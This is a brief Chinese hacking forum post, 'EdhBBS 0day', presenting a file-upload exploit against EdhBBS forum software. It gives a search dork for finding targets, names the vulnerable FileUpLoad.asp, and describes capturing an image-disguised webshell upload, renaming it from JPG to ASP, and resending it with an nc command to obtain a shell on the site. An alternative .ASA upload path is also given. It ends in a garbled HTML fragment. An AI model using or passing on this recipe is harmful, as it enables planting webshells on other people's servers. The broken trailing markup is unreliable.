EdhBBS 0day -电脑资料
----------------------------------------------------
From:www.3est.com
Author:yyxh520
-------------------------------------------------------------
关键字:inurl:EdhBBS
漏洞文件:EdhBBS/FileUpLoad.asp
抓包上传的图片小马
按下图做修改:
把JPG直接改为ASP,不用在后面加空格
最后用nc上传提交就行了
nc www.xxxxx.com 80 <1.txt
成功得到shell???????????
祝大家圣诞快乐(*^__^*) 嘻嘻……
udb311兄弟的提议:
UpLoads/2009-12-24(16-20-49).ASA ``````
本地构造也行哦,
EdhBBS 0day
。不用NC```
代码:
Load="window.setTimeout(document.body.style.backgroundColor=parent.PadBgColor;,30);">
act
style="margin:0;padding:0">